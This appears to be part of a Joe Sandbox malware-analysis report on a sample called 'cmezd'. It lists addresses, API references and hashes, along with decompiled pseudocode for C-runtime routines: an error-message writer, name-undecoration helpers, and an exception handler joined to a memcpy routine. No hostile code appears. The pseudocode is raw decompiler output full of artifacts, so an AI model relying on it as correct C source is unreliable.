                                                                                              0x01358914
                                                                                              0x01358919
                                                                                              0x0135891c
                                                                                              0x01358935
                                                                                              0x01358935
                                                                                              0x01358940
                                                                                              0x01358947
                                                                                              0x013587bf
                                                                                              0x013587bf
                                                                                              0x013587c0
                                                                                              0x013587d0
                                                                                              0x013587d5
                                                                                              0x013587dc
                                                                                              0x013588a2
                                                                                              0x013588a2
                                                                                              0x013588a3
                                                                                              0x013588a4
                                                                                              0x013588a5
                                                                                              0x013588a6
                                                                                              0x013588a7
                                                                                              0x013588ac
                                                                                              0x013588af
                                                                                              0x013588b8
                                                                                              0x013588cc
                                                                                              0x013588c7
                                                                                              0x013588c9
                                                                                              0x013588c9
                                                                                              0x013587e2
                                                                                              0x013587e2
                                                                                              0x013587e8
                                                                                              0x013587ed
                                                                                              0x01358802
                                                                                              0x0135881b
                                                                                              0x0135881b
                                                                                              0x0135881b
                                                                                              0x0135881e
                                                                                              0x0135881e
                                                                                              0x01358821
                                                                                              0x01358824
                                                                                              0x0135882b
                                                                                              0x0135882d
                                                                                              0x01358833
                                                                                              0x01358856
                                                                                              0x01358856
                                                                                              0x01358865
                                                                                              0x01358871
                                                                                              0x00000000
                                                                                              0x01358873
                                                                                              0x01358873
                                                                                              0x01358878
                                                                                              0x01358880
                                                                                              0x01358883
                                                                                              0x00000000
                                                                                              0x01358885
                                                                                              0x01358885
                                                                                              0x0135888a
                                                                                              0x0135889b
                                                                                              0x0135889b
                                                                                              0x01358883
                                                                                              0x01358835
                                                                                              0x01358835
                                                                                              0x01358837
                                                                                              0x0135884a
                                                                                              0x0135884f
                                                                                              0x01358854
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01358854
                                                                                              0x01358804
                                                                                              0x0135880b
                                                                                              0x01358810
                                                                                              0x01358815
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01358815
                                                                                              0x01358802
                                                                                              0x013587dc

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,013A04EA,00000104), ref: 013587F5
                                                                                              • GetStdHandle.KERNEL32(000000F4), ref: 013588E5
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 01358935
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$HandleModuleNameWrite
                                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                              • API String ID: 3784150691-4022980321
                                                                                              • Opcode ID: b7ce1cc43a60dd9cce364672a46ae25bcc7ee3e48c5631c17c0934eb1c16a17f
                                                                                              • Instruction ID: 5f9572bf14afbc725a455e6f58a1fd527efacb4abb9c607ddbd81d7ec1cb5164
                                                                                              • Opcode Fuzzy Hash: b7ce1cc43a60dd9cce364672a46ae25bcc7ee3e48c5631c17c0934eb1c16a17f
                                                                                              • Instruction Fuzzy Hash: DA414A329002166AEB35662FAD45EEF7FECDF51B5CF4400B9EC04A6249FB21CA45C6A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01360A81 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 76%
                                                                                              			E01360A81(void* __ebx, void* __fp0, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v36;
				char _v44;
				void* __edi;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;
				intOrPtr* _t68;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				intOrPtr* _t83;
				char* _t88;
				intOrPtr* _t104;
				void* _t108;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t123;
				void* _t128;

				_t128 = __fp0;
				_t119 = _t118 - 0x28;
				if( *((char*)( *0x13a0b18)) == 0) {
					_t51 = _a8;
					_t115 = 0;
					if( *_a8 == 0) {
						goto L16;
					} else {
						_v28 = ")[";
						_v24 = 2;
						_t54 = E0135BBB1(E0135BB29(L0135BE4F(_t85,  &_v44, 0x28, _t51),  &_v36,  &_v28),  &_v20, 1);
						_t88 =  &_v12;
						goto L17;
					}
					L21:
				} else {
					_t113 = E0135D904();
					_t123 = _t113;
					if(_t123 < 0 || _t123 == 0) {
						_t115 = 0;
						L16:
						_v12 = _t115;
						_v8 = _t115;
						L0135BE9C( &_v12, 0x5b);
						_t54 = E0135BBB1( &_v12,  &_v44, 1);
						_t88 =  &_v36;
						L17:
						E01360109(_t128, _a4, E0135BB6D(_t54, _t88, 0x5d));
						_t57 = _a4;
					} else {
						_t83 = _a8;
						_v12 = 0;
						_v8 = 0;
						if(( *(_t83 + 4) & 0x00000800) == 0) {
							L5:
							_t62 = _t113;
							_t113 = _t113 - 1;
							if(_t62 != 0 &&  *((char*)( *0x13a0b18)) != 0) {
								_t77 = L0135BE4F(_t85,  &_v36, 0x5b, E0135D2B9(_t108,  &_v20, 0));
								_t119 = _t119 + 0x14;
								_t78 = E0135BB6D(_t77,  &_v44, 0x5d);
								_t85 =  &_v12;
								E0135BD24( &_v12, _t78);
								goto L8;
							}
						} else {
							_v20 = "[]";
							_t85 =  &_v12;
							_v16 = 2;
							E0135BC28( &_v12,  &_v20);
							L8:
							if(_v8 <= 1) {
								goto L5;
							}
						}
						if( *_t83 != 0) {
							if(( *(_t83 + 4) & 0x00000800) == 0) {
								_t68 = E0135BB6D(L0135BE4F(_t85,  &_v44, 0x28, _t83),  &_v36, 0x29);
								_push( &_v12);
								_push( &_v20);
								_t104 = _t68;
							} else {
								_t104 = _t83;
								_push( &_v12);
								_push( &_v44);
							}
							_t69 = E0135BB4B(_t104);
							_v12 =  *_t69;
							_v8 =  *((intOrPtr*)(_t69 + 4));
						}
						_push( &_v12);
						_push( &_v28);
						L0135F545(_t83, _t113, _t128);
						_t57 = _a4;
						 *_t57 = _v28;
						 *(_t57 + 4) = _v24 | 0x00000800;
					}
				}
				return _t57;
				goto L21;
			}





























                                                                                              0x01360a81
                                                                                              0x01360a89
                                                                                              0x01360a91
                                                                                              0x01360bd7
                                                                                              0x01360bda
                                                                                              0x01360bde
                                                                                              0x00000000
                                                                                              0x01360be0
                                                                                              0x01360be4
                                                                                              0x01360bee
                                                                                              0x01360c14
                                                                                              0x01360c19
                                                                                              0x00000000
                                                                                              0x01360c19
                                                                                              0x00000000
                                                                                              0x01360a97
                                                                                              0x01360a9c
                                                                                              0x01360a9e
                                                                                              0x01360aa0
                                                                                              0x01360b98
                                                                                              0x01360b9a
                                                                                              0x01360b9f
                                                                                              0x01360ba2
                                                                                              0x01360ba5
                                                                                              0x01360bb3
                                                                                              0x01360bb8
                                                                                              0x01360bbb
                                                                                              0x01360bc9
                                                                                              0x01360bce
                                                                                              0x01360aac
                                                                                              0x01360aad
                                                                                              0x01360ab2
                                                                                              0x01360ab5
                                                                                              0x01360abf
                                                                                              0x01360add
                                                                                              0x01360add
                                                                                              0x01360adf
                                                                                              0x01360ae2
                                                                                              0x01360aff
                                                                                              0x01360b04
                                                                                              0x01360b0f
                                                                                              0x01360b15
                                                                                              0x01360b18
                                                                                              0x00000000
                                                                                              0x01360b18
                                                                                              0x01360ac1
                                                                                              0x01360ac4
                                                                                              0x01360acc
                                                                                              0x01360acf
                                                                                              0x01360ad6
                                                                                              0x01360b1d
                                                                                              0x01360b21
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360b21
                                                                                              0x01360b25
                                                                                              0x01360b2e
                                                                                              0x01360b53
                                                                                              0x01360b5b
                                                                                              0x01360b5f
                                                                                              0x01360b60
                                                                                              0x01360b30
                                                                                              0x01360b33
                                                                                              0x01360b35
                                                                                              0x01360b39
                                                                                              0x01360b39
                                                                                              0x01360b62
                                                                                              0x01360b69
                                                                                              0x01360b6f
                                                                                              0x01360b6f
                                                                                              0x01360b75
                                                                                              0x01360b79
                                                                                              0x01360b7a
                                                                                              0x01360b7f
                                                                                              0x01360b90
                                                                                              0x01360b92
                                                                                              0x01360b95
                                                                                              0x01360aa0
                                                                                              0x01360bd6
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • DName::operator+.LIBCMT ref: 01360B0F
                                                                                              • DName::operator+.LIBCMT ref: 01360B53
                                                                                              • DName::operator+.LIBCMT ref: 01360B62
                                                                                                • Part of subcall function 0135BE4F: DName::operator+.LIBCMT ref: 0135BE70
                                                                                              • DName::operator+.LIBCMT ref: 01360BB3
                                                                                              • DName::operator+.LIBCMT ref: 01360BC0
                                                                                              • DName::operator+.LIBCMT ref: 01360C07
                                                                                              • DName::operator+.LIBCMT ref: 01360C14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+
                                                                                              • String ID:
                                                                                              • API String ID: 2943138195-0
                                                                                              • Opcode ID: 604b3cd33721188a64eec2eaac050c7b98173d0a0dff90fc683cc63b0d538c0e
                                                                                              • Instruction ID: e0064ce23e483539302545d65f6a5cd6c3b5e85c27eb6245aa5d10e6d9fdab3c
                                                                                              • Opcode Fuzzy Hash: 604b3cd33721188a64eec2eaac050c7b98173d0a0dff90fc683cc63b0d538c0e
                                                                                              • Instruction Fuzzy Hash: 49516071900219AFDF58DF98D895EEEFBBDEB18B08F048059F605A7184DB70D644CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01354650 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 45%
                                                                                              			E01354650(void* __ebx, void* __ecx, intOrPtr __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				void* _v36;
				void* _v40;
				char* __edi;
				intOrPtr* __esi;
				int _t150;
				signed int _t157;
				intOrPtr _t158;
				void* _t159;
				intOrPtr* _t160;
				intOrPtr _t162;
				void* _t165;
				signed int _t167;
				void _t175;
				void _t176;
				int _t178;
				unsigned int _t179;
				int _t180;
				int _t191;
				intOrPtr* _t195;
				intOrPtr _t196;
				signed int _t200;
				char _t202;
				int _t206;
				unsigned int _t207;
				int _t208;
				int _t210;
				int _t215;
				signed int _t226;
				unsigned int _t230;
				int _t231;
				int _t233;
				signed int _t239;
				void* _t240;
				intOrPtr _t241;
				void* _t243;
				signed int _t251;
				intOrPtr _t258;
				void* _t260;
				void* _t263;
				void* _t264;
				void* _t265;
				intOrPtr* _t267;
				int _t271;
				void* _t275;
				void* _t277;
				void* _t287;

				_t221 = __edx;
				_t195 = _a4;
				_push(_t240);
				_v5 = 0;
				_v16 = 1;
				 *_t195 = E0139353B(__ecx,  *_t195);
				_t196 = _a8;
				_t6 = _t196 + 0x10; // 0x11
				_t258 = _t6;
				_push(_t258);
				_v20 = _t258;
				_v12 =  *(_t196 + 8) ^  *0x139e210;
				E01354610(_t196, __edx, _t240, _t258,  *(_t196 + 8) ^  *0x139e210);
				E01362547(_a12);
				_t150 = _a4;
				_t277 = _t275 - 0x1c + 0x10;
				_t241 =  *((intOrPtr*)(_t196 + 0xc));
				if(( *(_t150 + 4) & 0x00000066) != 0) {
					__eflags = _t241 - 0xfffffffe;
					if(_t241 != 0xfffffffe) {
						_t221 = 0xfffffffe;
						E01362530(_t196, 0xfffffffe, _t258, 0x139e210);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t150;
					_v28 = _a12;
					 *((intOrPtr*)(_t196 - 4)) =  &_v32;
					if(_t241 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t200 = _v12;
							_t157 = _t241 + (_t241 + 2) * 2;
							_t196 =  *((intOrPtr*)(_t200 + _t157 * 4));
							_t158 = _t200 + _t157 * 4;
							_t201 =  *((intOrPtr*)(_t158 + 4));
							_v24 = _t158;
							if( *((intOrPtr*)(_t158 + 4)) == 0) {
								_t202 = _v5;
								goto L7;
							} else {
								_t221 = _t258;
								_t159 = E013624D0(_t201, _t258);
								_t202 = 1;
								_v5 = 1;
								_t287 = _t159;
								if(_t287 < 0) {
									_v16 = 0;
									L13:
									_push(_t258);
									E01354610(_t196, _t221, _t241, _t258, _v12);
									goto L14;
								} else {
									if(_t287 > 0) {
										_t160 = _a4;
										__eflags =  *_t160 - 0xe06d7363;
										if( *_t160 == 0xe06d7363) {
											__eflags =  *0x1394218;
											if(__eflags != 0) {
												_t191 = E013622F0(__eflags, 0x1394218);
												_t277 = _t277 + 4;
												__eflags = _t191;
												if(_t191 != 0) {
													_t271 =  *0x1394218; // 0x135412d
													 *0x13a2000(_a4, 1);
													 *_t271();
													_t258 = _v20;
													_t277 = _t277 + 8;
												}
												_t160 = _a4;
											}
										}
										_t222 = _t160;
										E01362510(_t160, _a8, _t160);
										_t162 = _a8;
										__eflags =  *((intOrPtr*)(_t162 + 0xc)) - _t241;
										if( *((intOrPtr*)(_t162 + 0xc)) != _t241) {
											_t222 = _t241;
											E01362530(_t162, _t241, _t258, 0x139e210);
											_t162 = _a8;
										}
										_push(_t258);
										 *((intOrPtr*)(_t162 + 0xc)) = _t196;
										E01354610(_t196, _t222, _t241, _t258, _v12);
										E013624F0();
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t241);
										_push(_t258);
										_t260 = _v36;
										_t206 = _v32;
										_t243 = _v40;
										_t165 = _t260 + _t206;
										__eflags = _t243 - _t260;
										if(_t243 <= _t260) {
											L25:
											__eflags = _t206 - 0x20;
											if(_t206 < 0x20) {
												L96:
												_t207 = _t206 & 0x0000001f;
												__eflags = _t207;
												if(_t207 != 0) {
													_t167 = _t207;
													_t208 = _t207 >> 2;
													__eflags = _t208;
													while(_t208 != 0) {
														 *_t243 =  *_t260;
														_t243 = _t243 + 4;
														_t260 = _t260 + 4;
														_t208 = _t208 - 1;
														__eflags = _t208;
													}
													_t210 = _t167 & 0x00000003;
													__eflags = _t210;
													while(_t210 != 0) {
														 *_t243 =  *_t260;
														_t260 = _t260 + 1;
														_t243 = _t243 + 1;
														_t210 = _t210 - 1;
														__eflags = _t210;
													}
												}
												goto L102;
											} else {
												__eflags = _t206 - 0x80;
												if(__eflags >= 0) {
													asm("bt dword [0x139fe24], 0x1");
													if(__eflags >= 0) {
														__eflags = (_t243 ^ _t260) & 0x0000000f;
														if(__eflags != 0) {
															L33:
															asm("bt dword [0x139fe24], 0x0");
															if(__eflags >= 0) {
																goto L58;
															} else {
																__eflags = _t243 & 0x00000003;
																if((_t243 & 0x00000003) != 0) {
																	goto L58;
																} else {
																	__eflags = _t260 & 0x00000003;
																	if(__eflags == 0) {
																		asm("bt edi, 0x2");
																		if(__eflags < 0) {
																			_t176 =  *_t260;
																			_t206 = _t206 - 4;
																			__eflags = _t206;
																			_t57 = _t260 + 4; // 0x438b0a74
																			_t260 = _t57;
																			 *_t243 = _t176;
																			_t243 = _t243 + 4;
																		}
																		asm("bt edi, 0x3");
																		if(__eflags < 0) {
																			asm("movq xmm1, [esi]");
																			_t206 = _t206 - 8;
																			__eflags = _t206;
																			_t59 = _t260 + 8; // 0xa3008b14
																			_t260 = _t59;
																			asm("movq [edi], xmm1");
																			_t243 = _t243 + 8;
																		}
																		__eflags = _t260 & 0x00000007;
																		if(__eflags == 0) {
																			asm("movdqa xmm1, [esi-0x8]");
																			_t67 = _t260 - 8; // 0xe850fc45
																			_t263 = _t67;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t263 = _t263 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0x8");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0x8");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0x8");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t263 + 8;
																		} else {
																			asm("bt esi, 0x3");
																			if(__eflags >= 0) {
																				asm("movdqa xmm1, [esi-0x4]");
																				_t71 = _t260 - 4; // 0x2c5
																				_t264 = _t71;
																				do {
																					asm("movdqa xmm3, [esi+0x10]");
																					_t206 = _t206 - 0x30;
																					asm("movdqa xmm0, [esi+0x20]");
																					asm("movdqa xmm5, [esi+0x30]");
																					_t264 = _t264 + 0x30;
																					__eflags = _t206 - 0x30;
																					asm("movdqa xmm2, xmm3");
																					asm("palignr xmm3, xmm1, 0x4");
																					asm("movdqa [edi], xmm3");
																					asm("movdqa xmm4, xmm0");
																					asm("palignr xmm0, xmm2, 0x4");
																					asm("movdqa [edi+0x10], xmm0");
																					asm("movdqa xmm1, xmm5");
																					asm("palignr xmm5, xmm4, 0x4");
																					asm("movdqa [edi+0x20], xmm5");
																					_t243 = _t243 + 0x30;
																				} while (_t206 >= 0x30);
																				_t260 = _t264 + 4;
																				while(1) {
																					L51:
																					__eflags = _t206 - 0x10;
																					if(__eflags < 0) {
																						break;
																					}
																					asm("movdqu xmm1, [esi]");
																					_t206 = _t206 - 0x10;
																					_t260 = _t260 + 0x10;
																					asm("movdqa [edi], xmm1");
																					_t243 = _t243 + 0x10;
																				}
																				asm("bt ecx, 0x2");
																				if(__eflags < 0) {
																					_t175 =  *_t260;
																					_t206 = _t206 - 4;
																					__eflags = _t206;
																					_t260 = _t260 + 4;
																					 *_t243 = _t175;
																					_t243 = _t243 + 4;
																				}
																				asm("bt ecx, 0x3");
																				if(__eflags < 0) {
																					asm("movq xmm1, [esi]");
																					__eflags = _t206;
																					_t260 = _t260 + 8;
																					asm("movq [edi], xmm1");
																					_t243 = _t243 + 8;
																				}
																				goto __eax;
																			}
																			asm("movdqa xmm1, [esi-0xc]");
																			_t63 = _t260 - 0xc; // 0x8d50ec45
																			_t265 = _t63;
																			do {
																				asm("movdqa xmm3, [esi+0x10]");
																				_t206 = _t206 - 0x30;
																				asm("movdqa xmm0, [esi+0x20]");
																				asm("movdqa xmm5, [esi+0x30]");
																				_t265 = _t265 + 0x30;
																				__eflags = _t206 - 0x30;
																				asm("movdqa xmm2, xmm3");
																				asm("palignr xmm3, xmm1, 0xc");
																				asm("movdqa [edi], xmm3");
																				asm("movdqa xmm4, xmm0");
																				asm("palignr xmm0, xmm2, 0xc");
																				asm("movdqa [edi+0x10], xmm0");
																				asm("movdqa xmm1, xmm5");
																				asm("palignr xmm5, xmm4, 0xc");
																				asm("movdqa [edi+0x20], xmm5");
																				_t243 = _t243 + 0x30;
																			} while (_t206 >= 0x30);
																			_t260 = _t265 + 0xc;
																		}
																		goto L51;
																	}
																}
															}
															goto L60;
														} else {
															asm("bt dword [0x139e218], 0x1");
															if(__eflags < 0) {
																_t178 = _t260 & 0x0000000f;
																__eflags = _t178;
																if(_t178 != 0) {
																	_push(_t206 - 0x10);
																	_t179 = 0x10 - _t178;
																	_t215 = _t179 & 0x00000003;
																	__eflags = _t215;
																	while(_t215 != 0) {
																		 *_t243 =  *_t260;
																		_t260 = _t260 + 1;
																		_t243 = _t243 + 1;
																		_t215 = _t215 - 1;
																		__eflags = _t215;
																	}
																	_t180 = _t179 >> 2;
																	__eflags = _t180;
																	while(_t180 != 0) {
																		 *_t243 =  *_t260;
																		_t143 = _t260 + 4; // 0x14438b0a
																		_t260 = _t143;
																		_t243 = _t243 + 4;
																		_t180 = _t180 - 1;
																		__eflags = _t180;
																	}
																	_pop(_t206);
																}
																_t230 = _t206;
																_t206 = _t206 & 0x0000007f;
																_t231 = _t230 >> 7;
																__eflags = _t231;
																while(_t231 != 0) {
																	asm("movdqa xmm0, [esi]");
																	asm("movdqa xmm1, [esi+0x10]");
																	asm("movdqa xmm2, [esi+0x20]");
																	asm("movdqa xmm3, [esi+0x30]");
																	asm("movdqa [edi], xmm0");
																	asm("movdqa [edi+0x10], xmm1");
																	asm("movdqa [edi+0x20], xmm2");
																	asm("movdqa [edi+0x30], xmm3");
																	asm("movdqa xmm4, [esi+0x40]");
																	asm("movdqa xmm5, [esi+0x50]");
																	asm("movdqa xmm6, [esi+0x60]");
																	asm("movdqa xmm7, [esi+0x70]");
																	asm("movdqa [edi+0x40], xmm4");
																	asm("movdqa [edi+0x50], xmm5");
																	asm("movdqa [edi+0x60], xmm6");
																	asm("movdqa [edi+0x70], xmm7");
																	_t138 = _t260 + 0x80; // 0x8740139
																	_t260 = _t138;
																	_t243 = _t243 + 0x80;
																	_t231 = _t231 - 1;
																	__eflags = _t231;
																}
																goto L92;
															} else {
																goto L33;
															}
														}
													} else {
														memcpy(_t243, _t260, _t206);
														return _v40;
													}
												} else {
													asm("bt dword [0x139e218], 0x1");
													if(__eflags < 0) {
														L92:
														__eflags = _t206;
														if(_t206 != 0) {
															_t233 = _t206 >> 5;
															__eflags = _t233;
															if(_t233 != 0) {
																do {
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t140 = _t260 + 0x20; // 0x8bc35be3
																	_t260 = _t140;
																	_t243 = _t243 + 0x20;
																	_t233 = _t233 - 1;
																	__eflags = _t233;
																} while (_t233 != 0);
															}
															goto L96;
														}
														L102:
														return _v40;
													} else {
														L58:
														__eflags = _t243 & 0x00000003;
														while((_t243 & 0x00000003) != 0) {
															 *_t243 =  *_t260;
															_t206 = _t206 - 1;
															_t260 = _t260 + 1;
															_t243 = _t243 + 1;
															__eflags = _t243 & 0x00000003;
														}
														L60:
														_t226 = _t206;
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L96;
														} else {
															memcpy(_t243, _t260, _t206 >> 2 << 2);
															switch( *((intOrPtr*)((_t226 & 0x00000003) * 4 +  &M01354A14))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *__edi =  *__esi;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	 *__edi =  *__esi;
																	_t92 = __esi + 1; // 0xc0330cc4
																	 *((char*)(__edi + 1)) =  *_t92;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	 *__edi =  *__esi;
																	_t95 = __esi + 1; // 0x74000c7b
																	 *((char*)(__edi + 1)) =  *_t95;
																	_t97 = __esi + 2; // 0xa74000c
																	 *((char*)(__edi + 2)) =  *_t97;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											}
										} else {
											__eflags = _t243 - _t165;
											if(_t243 < _t165) {
												_t267 = _t260 + _t206;
												_t251 = _t243 + _t206;
												__eflags = _t206 - 0x20;
												if(__eflags < 0) {
													L83:
													__eflags = _t206 & 0xfffffffc;
													while((_t206 & 0xfffffffc) != 0) {
														_t251 = _t251 - 4;
														_t267 = _t267 - 4;
														 *_t251 =  *_t267;
														_t206 = _t206 - 4;
														__eflags = _t206 & 0xfffffffc;
													}
													__eflags = _t206;
													if(_t206 != 0) {
														do {
															_t251 = _t251 - 1;
															_t267 = _t267 - 1;
															 *_t251 =  *_t267;
															_t206 = _t206 - 1;
															__eflags = _t206;
														} while (_t206 != 0);
													}
													return _v40;
												} else {
													asm("bt dword [0x139e218], 0x1");
													if(__eflags < 0) {
														__eflags = _t251 & 0x0000000f;
														if((_t251 & 0x0000000f) != 0) {
															do {
																_t206 = _t206 - 1;
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																 *_t251 =  *_t267;
																__eflags = _t251 & 0x0000000f;
															} while ((_t251 & 0x0000000f) != 0);
															while(1) {
																L79:
																__eflags = _t206 - 0x80;
																if(_t206 < 0x80) {
																	break;
																}
																_t267 = _t267 - 0x80;
																_t251 = _t251 - 0x80;
																asm("movdqu xmm0, [esi]");
																asm("movdqu xmm1, [esi+0x10]");
																asm("movdqu xmm2, [esi+0x20]");
																asm("movdqu xmm3, [esi+0x30]");
																asm("movdqu xmm4, [esi+0x40]");
																asm("movdqu xmm5, [esi+0x50]");
																asm("movdqu xmm6, [esi+0x60]");
																asm("movdqu xmm7, [esi+0x70]");
																asm("movdqu [edi], xmm0");
																asm("movdqu [edi+0x10], xmm1");
																asm("movdqu [edi+0x20], xmm2");
																asm("movdqu [edi+0x30], xmm3");
																asm("movdqu [edi+0x40], xmm4");
																asm("movdqu [edi+0x50], xmm5");
																asm("movdqu [edi+0x60], xmm6");
																asm("movdqu [edi+0x70], xmm7");
																_t206 = _t206 - 0x80;
																__eflags = _t206 & 0xffffff80;
																if((_t206 & 0xffffff80) != 0) {
																	continue;
																}
																break;
															}
															__eflags = _t206 - 0x20;
															if(_t206 >= 0x20) {
																do {
																	_t267 = _t267 - 0x20;
																	_t251 = _t251 - 0x20;
																	asm("movdqu xmm0, [esi]");
																	asm("movdqu xmm1, [esi+0x10]");
																	asm("movdqu [edi], xmm0");
																	asm("movdqu [edi+0x10], xmm1");
																	_t206 = _t206 - 0x20;
																	__eflags = _t206 & 0xffffffe0;
																} while ((_t206 & 0xffffffe0) != 0);
															}
															goto L83;
														}
														goto L79;
													} else {
														__eflags = _t251 & 0x00000003;
														if((_t251 & 0x00000003) != 0) {
															_t239 = _t251 & 0x00000003;
															_t206 = _t206 - _t239;
															__eflags = _t206;
															do {
																_t104 = _t267 - 1; // 0xc7b8000
																 *(_t251 - 1) =  *_t104;
																_t267 = _t267 - 1;
																_t251 = _t251 - 1;
																_t239 = _t239 - 1;
																__eflags = _t239;
															} while (_t239 != 0);
														}
														__eflags = _t206 - 0x20;
														if(_t206 < 0x20) {
															goto L83;
														} else {
															asm("std");
															memcpy(_t251 - 4, _t267 - 4, _t206 >> 2 << 2);
															asm("cld");
															switch( *((intOrPtr*)((_t206 & 0x00000003) * 4 +  &M01354AC0))) {
																case 0:
																	return _v40;
																	goto L108;
																case 1:
																	 *((char*)(__edi + 3)) =  *((intOrPtr*)(__esi + 3));
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 2:
																	_t113 = __esi + 3; // 0x36ebc033
																	 *((char*)(__edi + 3)) =  *_t113;
																	_t115 = __esi + 2; // 0xebc0330c
																	 *((char*)(__edi + 2)) =  *_t115;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
																case 3:
																	_t118 = __esi + 3; // 0x8b0a7400
																	 *((char*)(__edi + 3)) =  *_t118;
																	_t120 = __esi + 2; // 0xa74000c
																	 *((char*)(__edi + 2)) =  *_t120;
																	_t122 = __esi + 1; // 0x74000c7b
																	 *((char*)(__edi + 1)) =  *_t122;
																	__eax = _v40;
																	_pop(__esi);
																	_pop(__edi);
																	return _v40;
																	goto L108;
															}
														}
													}
												}
											} else {
												goto L25;
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L108;
							L7:
							_t241 = _t196;
						} while (_t196 != 0xfffffffe);
						if(_t202 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L108:
			}
























































                                                                                              0x01354650
                                                                                              0x01354657
                                                                                              0x0135465b
                                                                                              0x0135465c
                                                                                              0x01354662
                                                                                              0x0135466e
                                                                                              0x01354670
                                                                                              0x01354676
                                                                                              0x01354676
                                                                                              0x0135467f
                                                                                              0x01354681
                                                                                              0x01354684
                                                                                              0x01354687
                                                                                              0x0135468f
                                                                                              0x01354694
                                                                                              0x01354697
                                                                                              0x0135469a
                                                                                              0x013546a1
                                                                                              0x013546fd
                                                                                              0x01354700
                                                                                              0x01354708
                                                                                              0x0135470f
                                                                                              0x00000000
                                                                                              0x0135470f
                                                                                              0x00000000
                                                                                              0x013546a3
                                                                                              0x013546a3
                                                                                              0x013546a9
                                                                                              0x013546af
                                                                                              0x013546b5
                                                                                              0x01354720
                                                                                              0x01354729
                                                                                              0x013546b7
                                                                                              0x013546b7
                                                                                              0x013546b7
                                                                                              0x013546bd
                                                                                              0x013546c0
                                                                                              0x013546c3
                                                                                              0x013546c6
                                                                                              0x013546c9
                                                                                              0x013546ce
                                                                                              0x013546e4
                                                                                              0x00000000
